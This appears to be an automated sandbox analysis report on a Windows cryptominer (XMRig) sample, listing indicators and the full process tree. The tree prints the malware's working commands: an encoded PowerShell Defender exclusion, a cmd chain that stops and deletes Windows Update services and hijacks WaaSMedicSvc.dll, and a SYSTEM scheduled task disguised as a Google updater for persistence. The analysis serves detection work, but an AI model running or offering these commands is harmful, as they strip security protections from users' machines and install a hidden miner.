Analysis
-
max time kernel
299s -
max time network
274s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
15-05-2022 10:15
Static task
static1
Behavioral task
behavioral1
Sample
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
Resource
win7-20220414-en
General
-
Target
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
-
Size
7.6MB
-
MD5
95104aa61ed30687c13e5c644d5722f3
-
SHA1
f9788f808044d448f73203d93da0021cefb781ff
-
SHA256
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
-
SHA512
99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
XMRig Miner Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/1376-396-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/1376-397-0x000000014036DB84-mapping.dmp xmrig behavioral2/memory/1376-398-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/1376-400-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/1376-403-0x0000000140000000-0x0000000140803000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
services.exepid process 2188 services.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 3132 icacls.exe 3756 takeown.exe 872 icacls.exe 68 takeown.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 68 takeown.exe 3132 icacls.exe 3756 takeown.exe 872 icacls.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
conhost.exedescription pid process target process PID 1876 set thread context of 3544 1876 conhost.exe conhost.exe PID 1876 set thread context of 1376 1876 conhost.exe svchost.exe -
Drops file in Program Files directory 3 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Program Files\Windows\services.exe conhost.exe File opened for modification C:\Program Files\Windows\services.exe conhost.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 52 IoCs
Processes:
conhost.exepowershell.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 2252 reg.exe 428 reg.exe 524 reg.exe 3876 reg.exe 2100 reg.exe 2828 reg.exe 2200 reg.exe 836 reg.exe 3324 reg.exe 3320 reg.exe 3168 reg.exe 412 reg.exe 796 reg.exe 3336 reg.exe 1988 reg.exe 412 reg.exe 2772 reg.exe 3900 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exesvchost.exepid process 3780 powershell.exe 3780 powershell.exe 3780 powershell.exe 3924 conhost.exe 200 powershell.exe 200 powershell.exe 200 powershell.exe 1876 conhost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe 1376 svchost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 640 -
Suspicious use of AdjustPrivilegeToken 41 IoCs
Processes:
powershell.execonhost.exetakeown.exepowershell.execonhost.exetakeown.exesvchost.exedescription pid process Token: SeDebugPrivilege 3780 powershell.exe Token: SeIncreaseQuotaPrivilege 3780 powershell.exe Token: SeSecurityPrivilege 3780 powershell.exe Token: SeTakeOwnershipPrivilege 3780 powershell.exe Token: SeLoadDriverPrivilege 3780 powershell.exe Token: SeSystemProfilePrivilege 3780 powershell.exe Token: SeSystemtimePrivilege 3780 powershell.exe Token: SeProfSingleProcessPrivilege 3780 powershell.exe Token: SeIncBasePriorityPrivilege 3780 powershell.exe Token: SeCreatePagefilePrivilege 3780 powershell.exe Token: SeBackupPrivilege 3780 powershell.exe Token: SeRestorePrivilege 3780 powershell.exe Token: SeShutdownPrivilege 3780 powershell.exe Token: SeDebugPrivilege 3780 powershell.exe Token: SeSystemEnvironmentPrivilege 3780 powershell.exe Token: SeRemoteShutdownPrivilege 3780 powershell.exe Token: SeUndockPrivilege 3780 powershell.exe Token: SeManageVolumePrivilege 3780 powershell.exe Token: 33 3780 powershell.exe Token: 34 3780 powershell.exe Token: 35 3780 powershell.exe Token: 36 3780 powershell.exe Token: SeDebugPrivilege 3924 conhost.exe Token: SeTakeOwnershipPrivilege 3756 takeown.exe Token: SeDebugPrivilege 200 powershell.exe Token: SeAssignPrimaryTokenPrivilege 200 powershell.exe Token: SeIncreaseQuotaPrivilege 200 powershell.exe Token: SeSecurityPrivilege 200 powershell.exe Token: SeTakeOwnershipPrivilege 200 powershell.exe Token: SeLoadDriverPrivilege 200 powershell.exe Token: SeSystemtimePrivilege 200 powershell.exe Token: SeBackupPrivilege 200 powershell.exe Token: SeRestorePrivilege 200 powershell.exe Token: SeShutdownPrivilege 200 powershell.exe Token: SeSystemEnvironmentPrivilege 200 powershell.exe Token: SeUndockPrivilege 200 powershell.exe Token: SeManageVolumePrivilege 200 powershell.exe Token: SeDebugPrivilege 1876 conhost.exe Token: SeTakeOwnershipPrivilege 68 takeown.exe Token: SeLockMemoryPrivilege 1376 svchost.exe Token: SeLockMemoryPrivilege 1376 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.execonhost.execmd.execmd.execmd.execmd.exeservices.exedescription pid process target process PID 3904 wrote to memory of 3924 3904 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe conhost.exe PID 3904 wrote to memory of 3924 3904 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe conhost.exe PID 3904 wrote to memory of 3924 3904 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe conhost.exe PID 3924 wrote to memory of 1812 3924 conhost.exe cmd.exe PID 3924 wrote to memory of 1812 3924 conhost.exe cmd.exe PID 1812 wrote to memory of 3780 1812 cmd.exe powershell.exe PID 1812 wrote to memory of 3780 1812 cmd.exe powershell.exe PID 3924 wrote to memory of 2708 3924 conhost.exe cmd.exe PID 3924 wrote to memory of 2708 3924 conhost.exe cmd.exe PID 2708 wrote to memory of 2088 2708 cmd.exe sc.exe PID 2708 wrote to memory of 2088 2708 cmd.exe sc.exe PID 2708 wrote to memory of 304 2708 cmd.exe sc.exe PID 2708 wrote to memory of 304 2708 cmd.exe sc.exe PID 2708 wrote to memory of 316 2708 cmd.exe sc.exe PID 2708 wrote to memory of 316 2708 cmd.exe sc.exe PID 2708 wrote to memory of 2308 2708 cmd.exe sc.exe PID 2708 wrote to memory of 2308 2708 cmd.exe sc.exe PID 2708 wrote to memory of 1716 2708 cmd.exe sc.exe PID 2708 wrote to memory of 1716 2708 cmd.exe sc.exe PID 2708 wrote to memory of 2828 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2828 2708 cmd.exe reg.exe PID 2708 wrote to memory of 428 2708 cmd.exe reg.exe PID 2708 wrote to memory of 428 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2772 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2772 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2200 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2200 2708 cmd.exe reg.exe PID 2708 wrote to memory of 3900 2708 cmd.exe reg.exe PID 2708 wrote to memory of 3900 2708 cmd.exe reg.exe PID 3924 wrote to memory of 1632 3924 conhost.exe cmd.exe PID 3924 wrote to memory of 1632 3924 conhost.exe cmd.exe PID 2708 wrote to memory of 3756 2708 cmd.exe takeown.exe PID 2708 wrote to memory of 3756 2708 cmd.exe takeown.exe PID 1632 wrote to memory of 3908 1632 cmd.exe schtasks.exe PID 1632 wrote to memory of 3908 1632 cmd.exe schtasks.exe PID 2708 wrote to memory of 3132 2708 cmd.exe icacls.exe PID 2708 wrote to memory of 3132 2708 cmd.exe icacls.exe PID 2708 wrote to memory of 2252 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2252 2708 cmd.exe reg.exe PID 2708 wrote to memory of 524 2708 cmd.exe reg.exe PID 2708 wrote to memory of 524 2708 cmd.exe reg.exe PID 2708 wrote to memory of 412 2708 cmd.exe reg.exe PID 2708 wrote to memory of 412 2708 cmd.exe reg.exe PID 2708 wrote to memory of 3168 2708 cmd.exe reg.exe PID 2708 wrote to memory of 3168 2708 cmd.exe reg.exe PID 2708 wrote to memory of 3732 2708 cmd.exe schtasks.exe PID 2708 wrote to memory of 3732 2708 cmd.exe schtasks.exe PID 2708 wrote to memory of 3768 2708 cmd.exe schtasks.exe PID 2708 wrote to memory of 3768 2708 cmd.exe schtasks.exe PID 2708 wrote to memory of 1412 2708 cmd.exe schtasks.exe PID 2708 wrote to memory of 1412 2708 cmd.exe schtasks.exe PID 2708 wrote to memory of 2512 2708 cmd.exe schtasks.exe PID 2708 wrote to memory of 2512 2708 cmd.exe schtasks.exe PID 2708 wrote to memory of 2076 2708 cmd.exe schtasks.exe PID 2708 wrote to memory of 2076 2708 cmd.exe schtasks.exe PID 2708 wrote to memory of 2072 2708 cmd.exe schtasks.exe PID 2708 wrote to memory of 2072 2708 cmd.exe schtasks.exe PID 2708 wrote to memory of 2568 2708 cmd.exe schtasks.exe PID 2708 wrote to memory of 2568 2708 cmd.exe schtasks.exe PID 3924 wrote to memory of 2524 3924 conhost.exe cmd.exe PID 3924 wrote to memory of 2524 3924 conhost.exe cmd.exe PID 2524 wrote to memory of 2492 2524 cmd.exe schtasks.exe PID 2524 wrote to memory of 2492 2524 cmd.exe schtasks.exe PID 2188 wrote to memory of 1876 2188 services.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Program Files\Windows\services.exe"C:\Program Files\Windows\services.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled 